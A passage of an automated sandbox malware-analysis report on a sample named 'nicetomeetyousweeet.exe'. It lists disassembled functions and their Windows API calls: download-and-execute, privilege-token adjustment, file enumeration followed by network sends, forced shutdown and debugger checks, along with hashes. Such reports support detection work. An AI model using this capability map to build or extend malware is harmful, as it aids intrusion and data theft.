                                                                                • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                • Instruction ID: 0b934bdcbae33d53fc5b2a9f2fb61eac0c4038549317178ff01681d74d484525
                                                                                • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                • Instruction Fuzzy Hash: 6D515472944109DBCF08FBA4DD5EAED7778AF50311FA00159B806A7192EF3C9B49CB91
                                                                                Function 00796D1E Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00796D2B
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00796D32
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 00796D44
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00796D63
                                                                                • GetLastError.KERNEL32 ref: 00796D69
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID:
                                                                                • API String ID: 3534403312-0
                                                                                • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DownloadExecuteFileShell
                                                                                • String ID: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$open
                                                                                • API String ID: 2825088817-2911420308
                                                                                • Opcode ID: 0569d32d956a677e31188ff047207d90508ee8dc6b8b30382d534a6bcd887559
                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                • Opcode Fuzzy Hash: 0569d32d956a677e31188ff047207d90508ee8dc6b8b30382d534a6bcd887559
                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                Function 0078E7B6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0079271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0079273E
                                                                                  • Part of subcall function 0079271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0079275C
                                                                                  • Part of subcall function 0079271E: RegCloseKey.ADVAPI32(00000000), ref: 00792767
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0078E86A
                                                                                • ExitProcess.KERNEL32 ref: 0078E8D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: pth_unenc$BG
                                                                                • API String ID: 2281282204-2233081382
                                                                                • Opcode ID: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                                                • Instruction ID: 0caf45291c87f558dc9af1631e1ff2d68cdb2c146413b5157d08f4fdce54a1dc
                                                                                • Opcode Fuzzy Hash: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                                                • Instruction Fuzzy Hash: 6521F831F84300E7DA1876799C5FA7E35995B80712F544028F415672DBFF6E8E0283A7
                                                                                Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: x@G$x@G
                                                                                • API String ID: 4113138495-3390264752
                                                                                • Opcode ID: ab3188fd4a5cbfac4f43ad498b618a4c3e8b323c43051b394baa4432c92144ed
                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                • Opcode Fuzzy Hash: ab3188fd4a5cbfac4f43ad498b618a4c3e8b323c43051b394baa4432c92144ed
                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                Function 00786D29 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00786D44
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00786E0C
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstNextsend
                                                                                • String ID: x@G$x@G
                                                                                • API String ID: 4113138495-3390264752
                                                                                • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                • Instruction ID: 9ab6fa55baf198b90a3b0870cdaecdd34d38bbb507b4d2544d56bb1e592e2bf5
                                                                                • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                • Instruction Fuzzy Hash: 7C21B431684245EFC714FB64DD99DEFB7ACEF80351F400929F68692192EF389A0AC752
                                                                                Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: e058ffd10f7cf657ce5424fe27c8305cdcee6081d0d8a7eb5147209b2a7de27e
                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                • Opcode Fuzzy Hash: e058ffd10f7cf657ce5424fe27c8305cdcee6081d0d8a7eb5147209b2a7de27e
                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                Function 0041BB71 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: 019e56e2c93cdfed7ba7db431c15a776d9c81b0efa82d3df3d91d6e49c9cae9f
                                                                                • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                • Opcode Fuzzy Hash: 019e56e2c93cdfed7ba7db431c15a776d9c81b0efa82d3df3d91d6e49c9cae9f
                                                                                • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                • String ID:
                                                                                • API String ID: 4212172061-0
                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                Function 007D0CE6 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C7126: GetLastError.KERNEL32(?,007BE4C7,007B9583,007BE4C7,00475B70,?,007BBBBC,FF8BC35D,00475B70,00473EE8), ref: 007C712A
                                                                                  • Part of subcall function 007C7126: _free.LIBCMT ref: 007C715D
                                                                                  • Part of subcall function 007C7126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 007C719E
                                                                                  • Part of subcall function 007C7126: _abort.LIBCMT ref: 007C71A4
                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 007D0DC8
                                                                                • _wcschr.LIBVCRUNTIME ref: 007D0E58
                                                                                • _wcschr.LIBVCRUNTIME ref: 007D0E66
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 007D0F09
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                • String ID:
                                                                                • API String ID: 4212172061-0
                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction ID: acc2e9b25ec8c04a935f76aeb6c051d1f420d1836248145ed45acba691acd21a
                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                • Instruction Fuzzy Hash: 9461D671600205EADB24BB75DC4AFAA73B8EF48710F14556BF909DB281EA7CE940C7E0
                                                                                Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                • String ID:
                                                                                • API String ID: 301083792-0
                                                                                • Opcode ID: f4f51dc7378ae6c5969491192f148f2f5adf325efaa17fd3a5c6d868f2cde540
                                                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                • Opcode Fuzzy Hash: f4f51dc7378ae6c5969491192f148f2f5adf325efaa17fd3a5c6d868f2cde540
                                                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                Function 00448057 Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00448067
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                • String ID:
                                                                                • API String ID: 806657224-0
                                                                                • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 2829624132-0
                                                                                • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                Function 00795B1C Relevance: 4.6, APIs: 3, Instructions: 98libraryloadershutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00795BC2
                                                                                • LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 00795BD7
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00795BDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressExitLibraryLoadProcWindows
                                                                                • String ID:
                                                                                • API String ID: 1366546845-0
                                                                                • Opcode ID: 8e87e24a53ed8da24effc80685a90e9af26916bb391603b6d9938ccb756c893d
                                                                                • Instruction ID: 8d99ebebf987f8447a02e6c09c79c5fb6f9a74b9e626a7b0d2612796cd101916
                                                                                • Opcode Fuzzy Hash: 8e87e24a53ed8da24effc80685a90e9af26916bb391603b6d9938ccb756c893d
                                                                                • Instruction Fuzzy Hash: 882175B0684711DBCF15BBB0989EAAE23999F40350F904C29B60297583EF6CCD07D366
                                                                                Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                Function 007BA8C4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 007BA9BC
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 007BA9C6
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 007BA9D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction ID: d534e652730137fa57deaf66f82ac0fb96fd66e65ef392e5a0d5a51dcf2f2e0c
                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                • Instruction Fuzzy Hash: 9E31B275901219EBCB21DF64D8897DCBBB8BF08310F5042EAE80CA6251EB749F818F45
                                                                                Function 007B2BA1 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00471B2C,00000000,007B282C,00000034,00471B2C,?,?), ref: 007B2BB3
                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,007B28BE,00000000,?,00000000), ref: 007B2BC9
                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,007B28BE,00000000,?,00000000,0079D9C7), ref: 007B2BDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction ID: 9d8a8b7343bcd392177c438194384be65d9384dca9c003eb9b2b164183e3d92c
                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction Fuzzy Hash: 19E0923130D310BBEB310F15BC08FA73B94DB81B71F600A38F251E40E5EA6588419518
                                                                                Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                                                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                                                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                Function 007C27BB Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,007C2791,00000000,0046DAE0,0000000C,007C28E8,00000000,00000002,00000000), ref: 007C27DC
                                                                                • TerminateProcess.KERNEL32(00000000,?,007C2791,00000000,0046DAE0,0000000C,007C28E8,00000000,00000002,00000000), ref: 007C27E3
